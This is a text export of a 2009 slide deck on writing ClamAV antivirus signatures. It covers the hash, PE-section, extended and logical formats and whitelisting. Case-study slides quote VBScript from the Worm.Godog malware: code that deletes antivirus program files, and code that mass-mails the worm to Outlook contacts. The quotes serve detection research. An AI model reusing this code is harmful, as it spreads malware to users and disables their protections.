Alain Zidouemba presented on writing signatures for ClamAV. He discussed the different signature formats including .hdb, .mdb, .ndb, and .ldb. He provided examples of generating signatures using hash databases and extended signatures. He also demonstrated how to write logical signatures in .ldb format through a case study of the Worm.Godog malware. Whitelisting techniques were also covered, including adding entries to ignore specific signatures.

1. Writing ClamAV Signatures
Alain Zidouemba
March 4, 2009

2. About the presenter
Alain Zidouemba
• VRT Research Engineer for over a year
• Primary responsibilities:
• Malware research & signatures generation – ClamAV
• Vulnerability research & rules generation – Snort
• Before Sourcefire: Anti-Malware Research Engineer
2

3. Outline
What is ClamAV
Where to get ClamAV
Different ClamAV signature formats:
• .hdb
• .mdb
• .ndb
• .ldb
Whitelisting
Q&A
3

4. ClamAV

5. What is ClamAV?
Clam AntiVirus (ClamAV) is an open source
(GPL) anti-virus toolkit for UNIX, designed
especially for e-mail scanning on mail gateways
Provides a number of utilities including:
• A flexible and scalable multi-threaded daemon
(clamd)
• A command line scanner (clamscan)‫‏‬
• An advanced tool for automatic database updates
(freshclam)‫‏‬
• Sigtool – more later
5

6. Where can I get ClamAV from?
Latest stable release: ClamAV 0.94.2
• http://www.clamav.net/download/sources
Most popular UNIX operating systems are
supported:
• GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X
Up-to-date list of binary packages is available
at our website:
• http://clamav.net/download/packages
6

7. Why learn how to write sigs?
I thought Sourcefire released signatures
updates several times a day!
7

8. ClamAV malware detection
Goal: recognize and block malware
Detection is:
• File-centric
• Focus on recognizing malicious code in file
Not intended to replace desktop AV
First line of defense
8

9. ClamAV Virus Database (CVD)
The ClamAV project distributes two CVD files
• main.cvd
• daily.cvd
Sigtool (ships with ClamAV) can display
detailed information on CVD files:
9

10. Various signature files in .cvd
archive
10

11. Writing signatures for ClamAV

12. Hash database: *.hdb
The format for .hdb files is as follows:
• MD5:Size:MalwareName
To create a signature for test.exe use the --md5
option of sigtool:
12

13. Hash database: *.hdb (cont’d)
That’s it! The signature is ready to be used:
• The name for the detection can be changed:
13

14. MD5, PE-section based: *.mdb
The format for .mdb files is as follows:
• PESectionSize:MD5:MalwareName
The easiest way to generate MD5 based
section signatures is to extract target PE
sections into separate files and then run sigtool
with the option -- mdb:
14

15. Case study: Trojan.Bagle-328
IDA Pro indicates that the sample is “packed”
Packed with Themida (as per PEiD)‫‏‬
15

16. Case study: Trojan.Bagle-328
(cont'd)
Themida is used by malware writers...but
also by legitimate products – false positive
likely
We can use pe-sig, a Ruby script that will
create sigs for each section of a PE file:
Finally, the signature is:
• 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328
16

17. Extended sig. format: *.ndb
The format for .ndb files is as follows:
• MalwareName:TargetType:Offset:HexSignature
• TargetType is one of the following
numbers specifying the type of the target
file:
0: Any file 4: Mail File
1: Portable Executable 5: Graphics
2: OLE2 component (eg: VBA script) 6: ELF
3: HTML (normalized) 7: ASCII text file (normalized)
17

18. Case study: Trojan.Exchanger
Many files that are very similar yet different
18

19. Case study: Trojan.Exchanger
(cont’d)
5.exe:
Opcode:
• e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
19

20. Case study: Trojan.Exchanger
(cont’d)
7.exe:
Opcode:
• e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
20

21. Case study: Trojan.Exchanger
(cont’d)
Signature for 5.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature for 7.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature to detect both 5.exe and 7.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
21

22. Case study: Trojan.Exchanger
(cont’d)
Moreover, for 5.exe:
• EP: 0x4094E0
• Binary string: 0x4095C5
For 7.exe:
• EP: 0x406D87
• Binary string: 0x406E6C
In both cases the distance between EP and our
binary string is the same: 0xE5 = 229 (decimal)
22

23. Case study: Trojan.Exchanger
(cont’d)
Finally we can rewrite the signature to be:
• Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
This signature is more precise and even
matches other samples:
23

24. Logical signatures: *.ldb‫‏‬
Logical signatures introduced in ClamAV 0.94
The format for .ldb files is as follows:
• SignatureName;TargetDescriptionBlock;LogicalExpr
ession;Subsig0;Subsig1;Subsig2;...
24

25. Case study: Worm.Godog
A mass-mailer worm, code is in VBS
Registro = legion.regread("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir")‫‏‬
If FileExists (Registro & "Kaspersky LabKaspersky Antivirus Personal ProAvp32.exe") then path = Registro &
"Kaspersky LabKaspersky Antivirus Personal Pro"
legions.DeleteFile (Registro & "Kaspersky LabKaspersky Antivirus Personal Pro*.*")‫‏‬
If fileexists (Registro & "Kaspersky LabKaspersky Antivirus PersonalAvp32.exe") then path = Registro &
"Kaspersky LabKaspersky Antivirus Personal"
legions.DeleteFile (Registro & "Kaspersky LabKaspersky Antivirus Personal*.*")‫‏‬
if FileExists(Registro & "Antiviral Toolkit Proavp32.exe") then path = Registros & "Antiviral Toolkit Pro"
legions.DeleteFile (Registro & "Antiviral Toolkit Pro*.*")‫‏‬
if fileexists (Registro & "AVPersonalAvguard.exe") then path = Registro & "AVPersonal"
legions.DeleteFile (Registro & "AVPersonal*.*")‫‏‬
if fileexists (Registro & "Trend PC-cillin 98IOMON98.EXE") then path = Registro & "Trend PC-cillin 98"
legions.DeleteFile (Registro & "Trend PC-cillin 98*.*")‫‏‬
legions.DeleteFile (Registro & "Trend PC-cillin 98*.EXE")‫‏‬
legions.DeleteFile (Registro & "Trend PC-cillin 98*.dll")
25

26. Case study: Worm.Godog
(cont’d)
After normalization, we can create 4 signatures
to detect each attempt to disable AV tools as
follows:
(0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
{-100}2e64656c65746566696c652028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
(1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
(2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028
{-25}202620225c6176706572736f6e616c
(3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e
{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e
26

27. Case study: Worm.Godog
(cont’d)
Worm also send itself to the first 8000 contacts
found in the address book:
Set Create = CreateObject ("Scripting.FileSystemObject")‫‏‬
Set mail = Create.CreateTextFile("C:mail.vbs")‫‏‬
mail.writeline "On Error Resume Next"
mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"
mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"
mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"
mail.writeline "For A = 1 To Mail.AddressLists.Count"
mail.writeline "Set B = Mail.AddressLists (A)"
mail.writeline "Counter = 1"
mail.writeline "Set C = leg.CreateItem (0)"
mail.writeline "For D = 1 To B.AddressEntries.Count"
mail.writeline "E = B.AddressEntries (Counter)"
mail.writeline "C.Recipients.Add E"
mail.writeline "Counter = Counter + 1"
mail.writeline "If Counter > 8000 Then Exit For"
mail.writeline "Next"
mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)‫‏‬
mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34) ‫‏‬
mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:Legion.vbs" & Chr(34)‫‏‬
mail.writeline "C.DeleteAfterSubmit = True"
mail.writeline "C.Send"
mail.writeline "Next"
mail.Close
legion.Run ("C:mail.vbs")
27

28. Case study: Worm.Godog
(cont’d)
A signature to detect this worm portion of the
file could be:
(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74
{-100}726563697069656e74732e616464{-100}696620{-10}203e20
{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464
{-150}2e73656e64
Finally, we can write this highly flexible
signature:
• Worm.Godog;Target:0;((0|1|2|3)& (4));(0);(1);(2);(3);(4)
in a .ldb file:
Worm.Godog;Target:0;((0|1|2|3)& (4));66696c656578697374732028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028
{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c ;66696c6565786973747328{-
25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-
25}202620225c616e7469766972616c20746f6f6c6b69742070726f; 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-
100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c; 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-
100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e ;666f7220{-10}203d203120746f20{-
10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-
300}2e6174746163686d656e74732e616464{-150}2e73656e64
28

29. Whitelisting
To whitelist a specific file create an entry in a
database file with the extension of .fp following
the MD5 signature format:
• MD5:FileSize:Comment
29

30. Whitelisting (cont’d)
To whitelist a specific signature inside
main.cvd add the following entry into a local
file local.ign:
• db_name:line_number:signature_name
To ignore the “myTestSignature” at line 23 in
test.ndb:
• test.ndb:23:myTestSignature
Daily.ign:
30

31. More questions?
clamav-users@lists.clamav.net - user
questions
clamav-devel@lists.clamav.net - technical
discussions
Alternatively you can try asking on the
#clamav IRC channel on irc.freenode.net
If you have questions or comments on this
presentation: azidouemba@sourcefire.com
31

32. ClamAV/VRT/Sourcefire
Websites
• http://www.clamav.net
• http://www.snort.org
• htttp://www.sourcefire.com
Blogs
• http://clam-av.blogspot.com
• http://vrt-sourcefire.blogspot.com
32

33. Contribute
Sample submission
• http://www.clamav.net/sendvirus/
Upload statistics:
• freshclam --submit-stats
Bug submission
• http://bugs.clamav.net
33

34. Q&A

35. NOW GO AND WRITE
SIGNATURES!
35 Source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714